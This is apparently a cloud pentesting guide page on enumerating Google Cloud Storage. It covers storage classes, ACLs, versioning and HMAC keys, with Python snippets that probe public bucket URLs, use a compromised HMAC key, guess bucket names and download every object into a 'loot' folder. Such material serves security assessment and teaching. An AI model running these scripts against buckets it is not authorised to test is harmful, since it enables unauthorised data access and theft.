GCP - Storage Enum
Google Cloud Platform (GCP) Storage is a cloud-based storage solution that provides highly durable and available object storage for unstructured data. It offers various storage classes based on performance, availability, and cost, including Standard, Nearline, Coldline, and Archive. GCP Storage also provides advanced features such as lifecycle policies, versioning, and access control to manage and secure data effectively.
A bucket can be stored in a single region, in a dual-region, or in a multi-region (the default).
Standard Storage: This is the default storage option that offers high-performance, low-latency access to frequently accessed data. It is suitable for a wide range of use cases, including serving website content, streaming media, and hosting data analytics pipelines.
Nearline Storage: This storage class offers lower storage costs and slightly higher access costs than Standard Storage. It is optimized for infrequently accessed data, with a minimum storage duration of 30 days. It is ideal for backup and archival purposes.
Coldline Storage: This storage class is optimized for long-term storage of infrequently accessed data, with a minimum storage duration of 90 days. It offers lower storage costs than Nearline Storage, but with higher access costs.
Archive Storage: This storage class is designed for cold data that is accessed very infrequently, with a minimum storage duration of 365 days. It offers the lowest storage costs of all GCP storage options but with the highest access costs. It is suitable for long-term retention of data that needs to be stored for compliance or regulatory reasons.
Autoclass: If you don't know how often you are going to access the data, you can select Autoclass and GCP will automatically change the storage class for you to minimize costs.
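If you already have credentials, a quick way to see the class and location of each accessible bucket is the official google-cloud-storage Python client. A minimal sketch, assuming credentials are already configured in the environment:

```python
# Minimal sketch: list accessible buckets with their storage class and
# location using the google-cloud-storage client.
from google.cloud import storage

client = storage.Client()  # uses ambient credentials/project

for bucket in client.list_buckets():
    # storage_class is one of STANDARD, NEARLINE, COLDLINE or ARCHIVE
    print(f"{bucket.name}: {bucket.storage_class} ({bucket.location})")
```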
By default it's recommended to control access via IAM, but it's also possible to enable the use of ACLs. If you choose to use only IAM (the default) and 90 days pass, you won't be able to enable ACLs for the bucket anymore.
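From an enumeration perspective it's useful to know whether a bucket still allows ACLs, as they may grant access the IAM policy doesn't show. A minimal sketch, assuming credentials and a hypothetical bucket name:

```python
# Minimal sketch: check if a bucket enforces uniform bucket-level access
# (IAM only) or still allows ACLs. "target-bucket" is a placeholder.
from google.cloud import storage

bucket = storage.Client().get_bucket("target-bucket")

iam_only = bucket.iam_configuration.uniform_bucket_level_access_enabled
print(f"Uniform bucket-level access (IAM only): {iam_only}")
if not iam_only:
    # ACLs are usable; dump them (fetched lazily by the client)
    for entry in bucket.acl:  # e.g. {'entity': 'allUsers', 'role': 'READER'}
        print(entry)
```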
It's possible to enable versioning, which will save old versions of files inside the bucket. It's possible to configure the number of versions you want to keep and even how long you want noncurrent versions (old versions) to live. 7 days is recommended for the Standard class.
The metadata of a noncurrent version is kept. Moreover, ACLs of noncurrent versions are also kept, so older versions might have different ACLs from the current version.
Learn more in the docs.
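Since noncurrent versions may keep ACLs (and data) that were removed from the live object, it's worth enumerating them too. A minimal sketch, assuming credentials and a hypothetical bucket name:

```python
# Minimal sketch: list live AND noncurrent object versions of a bucket.
# "target-bucket" is a placeholder name.
from google.cloud import storage

client = storage.Client()
for blob in client.list_blobs("target-bucket", versions=True):
    state = "noncurrent" if blob.time_deleted else "live"
    print(f"{blob.name} (generation {blob.generation}) -> {state}")
```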
A retention policy indicates how long you want to forbid the deletion of objects inside the bucket (very useful for compliance, at least). Only one of versioning or retention policy can be enabled at the same time.
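You can check whether a retention policy is set, and whether it's locked, with the Python client. A sketch with a hypothetical bucket name:

```python
# Minimal sketch: read a bucket's retention policy ("target-bucket" is
# a placeholder; retention_period is expressed in seconds).
from google.cloud import storage

bucket = storage.Client().get_bucket("target-bucket")
if bucket.retention_period:
    print(f"{bucket.retention_period}s retention "
          f"(locked: {bucket.retention_policy_locked})")
else:
    print("No retention policy")
```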
By default objects are encrypted using Google-managed keys, but you can also use a key from KMS.
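To know which case applies to a bucket, you can check its default KMS key. A sketch (None means Google-managed keys):

```python
# Minimal sketch: show the default KMS key of a bucket, if any
# (None means objects are encrypted with Google-managed keys).
from google.cloud import storage

bucket = storage.Client().get_bucket("target-bucket")  # placeholder name
print(bucket.default_kms_key_name or "Google-managed keys")
```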
It's possible to give external users (authenticated in GCP or not) access to bucket contents. By default, when a bucket is created, the option to expose the bucket publicly is disabled, but with enough permissions this can be changed.
The format of a URL to access a bucket is https://storage.googleapis.com/<bucket-name> or https://<bucket-name>.storage.googleapis.com (both are valid).
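Therefore, a simple unauthenticated request to those URLs reveals whether a bucket is exposed. A minimal sketch with a hypothetical bucket name:

```python
# Minimal sketch: probe a bucket's public URL without authentication.
# "target-bucket" is a placeholder name.
import requests

r = requests.get("https://storage.googleapis.com/target-bucket")
if r.status_code == 200:
    print("[+] Publicly listable (the XML object listing is returned)")
elif r.status_code == 403:
    print("[-] Bucket exists but is not publicly listable")
else:  # typically 404
    print("[-] Bucket not found")
```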
An HMAC key is a type of credential and can be associated with a service account or a user account in Cloud Storage. You use an HMAC key to create signatures which are then included in requests to Cloud Storage. Signatures show that a given request is authorized by the user or service account.
HMAC keys have two primary pieces, an access ID and a secret.
Access ID: An alphanumeric string linked to a specific service or user account. When linked to a service account, the string is 61 characters in length, and when linked to a user account, the string is 24 characters in length. The following shows an example of an access ID:
GOOGTS7C7FUP3AIRVJTE2BCDKINBTES3HC2GY5CBFJDCQ2SYHV6A6XXVTJFSA
Secret: A 40-character Base-64 encoded string that is linked to a specific access ID. A secret is a preshared key that only you and Cloud Storage know. You use your secret to create signatures as part of the authentication process. The following shows an example of a secret:
bGoa+V7g/yqDXvKRqq+JTFn4uQZbPiQJo4pf9RzJ
Both the access ID and secret uniquely identify an HMAC key, but the secret is much more sensitive information, because it's used to create signatures.
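If you compromise an HMAC key pair, you can use it against the S3-compatible XML API of Cloud Storage (the interoperability endpoint), for example with boto3. A sketch using the example values above, assuming the key's account has storage permissions:

```python
# Minimal sketch: use a compromised HMAC key through the S3-compatible
# XML API (interoperability endpoint). Values are the example key above.
import boto3

s3 = boto3.client(
    "s3",
    endpoint_url="https://storage.googleapis.com",
    aws_access_key_id="GOOGTS7C7FUP3AIRVJTE2BCDKINBTES3HC2GY5CBFJDCQ2SYHV6A6XXVTJFSA",
    aws_secret_access_key="bGoa+V7g/yqDXvKRqq+JTFn4uQZbPiQJo4pf9RzJ",
)

# Lists the buckets of the project associated with the HMAC key
for b in s3.list_buckets()["Buckets"]:
    print(b["Name"])
```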
If you get a permission denied error while listing buckets, you may still have access to their content. So, now that you know the name convention of buckets, you can generate a list of possible names and try to access them:
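A minimal sketch of this idea (the keyword and permutations are just illustrative):

```python
# Minimal sketch: generate candidate bucket names from a keyword and
# probe them unauthenticated.
import requests

keyword = "companyname"  # hypothetical target keyword
candidates = [keyword] + [f"{keyword}-{s}" for s in
                          ("backup", "dev", "prod", "static", "data")]

for name in candidates:
    code = requests.get(f"https://storage.googleapis.com/{name}").status_code
    if code != 404:  # 200 = listable, 403 = exists but protected
        print(f"[+] {name} exists (HTTP {code})")
```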
With the permissions storage.objects.list and storage.objects.get, you should be able to enumerate all folders and files from the bucket in order to download them. You can achieve that with a Python script like the following:
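A minimal sketch (the bucket name and output directory are placeholders):

```python
# Minimal sketch: enumerate and download every object in a bucket.
import os
from google.cloud import storage

BUCKET = "target-bucket"  # placeholder
OUT = "loot"

client = storage.Client()
for blob in client.list_blobs(BUCKET):      # needs storage.objects.list
    if blob.name.endswith("/"):
        continue  # skip "folder" placeholder objects
    dest = os.path.join(OUT, blob.name)
    os.makedirs(os.path.dirname(dest), exist_ok=True)
    blob.download_to_filename(dest)         # needs storage.objects.get
    print(f"[+] {blob.name}")
```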
On the following page you can check how to abuse storage permissions to escalate privileges:
GCP - Storage Privesc